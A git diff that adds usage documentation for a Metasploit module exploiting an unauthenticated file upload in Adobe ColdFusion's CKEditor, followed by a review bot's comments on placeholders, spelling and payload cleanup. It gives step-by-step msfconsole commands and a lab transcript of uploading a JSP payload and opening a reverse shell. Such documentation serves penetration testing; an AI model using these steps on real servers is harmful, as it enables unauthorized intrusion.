diff --git a/documentation/modules/exploit/multi/http/coldfusion_ckeditor_file_upload.md b/documentation/modules/exploit/multi/http/coldfusion_ckeditor_file_upload.md new file mode 100644 index 0000000000..449b5fc420 --- /dev/null +++ b/documentation/modules/exploit/multi/http/coldfusion_ckeditor_file_upload.md 
@@ -0,0 +1,51 @@ +## Description + +A file upload vulnerability in the CKEditor of Adobe ColdFusion 11 +(Update 14 and earlier), ColdFusion 2016 (Update 6 and earlier), and +ColdFusion 2018 (July 12 release) allows unauthenticated remote +attackers to upload and execute JSP files through the filemanager +plugin. Tested on Adobe ColdFusion 2018 v2018.0.0.310739. + +## Vulnerable Application + +ColdFusion 11 (Update 14 and earlier), +ColdFusion 2016 (Update 6 and earlier), and +[ColdFusion 2018 (July 12 release)](https://bintray.com/eaps/coldfusion/cf%3Acoldfusion/2018.0.0) + + +## Verification Steps + +1. `./msfconsole -q` +2. `use exploit/multi/http/coldfusion_ckeditor_file_upload` +3. `set rhosts ` +4. `set lhost ` +5. `exploit` +6. Get a shell + + +## Scenarios + +### Tested on Coldfusion 2018 v2018.0.0.310739 + +``` + +msf5 > use exploit/multi/http/coldfusion_ckeditor_file_upload +msf5 exploit(multi/http/coldfusion_ckeditor_file_upload) > set rhosts 172.22.222.142 +rhosts => 172.22.222.142 +msf5 exploit(multi/http/coldfusion_ckeditor_file_upload) > set lhost 172.22.222.136 +lhost => 172.22.222.136 +msf5 exploit(multi/http/coldfusion_ckeditor_file_upload) > exploit + +[*] Started reverse TCP handler on 172.22.222.136:4444 +[*] Uploading the JSP payload at /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/ASMK.jsp... +[+] Upload succeeded! Executing payload... +[*] Command shell session 1 opened (172.22.222.136:4444 -> 172.22.222.142:43262) at 2019-01-10 06:30:52 -0600 + +whoami +cfuser +uname -a +Linux 6bd4238e7ffb 4.15.0-38-generic #41-Ubuntu SMP Wed Oct 10 10:59:38 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux +exit +[*] 172.22.222.142 - Command shell session 1 closed. +msf5 exploit(multi/http/coldfusion_ckeditor_file_upload) > +```
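Review bot: In Verification Steps, steps 3 and 4 read `set rhosts ` and `set lhost ` with no argument, so a reader following the list cannot tell what value belongs there. Add explicit placeholders such as `set rhosts [target IP]` and `set lhost [local IP]`, written so that a markdown renderer does not swallow them as an HTML tag. In Scenarios, the heading spells the product "Coldfusion" while the rest of the file uses "ColdFusion", and the code fence opens with a blank line that can be dropped. The transcript shows the payload written to `/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/ASMK.jsp` and no line indicating it is removed afterwards. The doc should state whether the module cleans up the uploaded JSP, since anyone reviewing a test needs to know whether that file remains on the target.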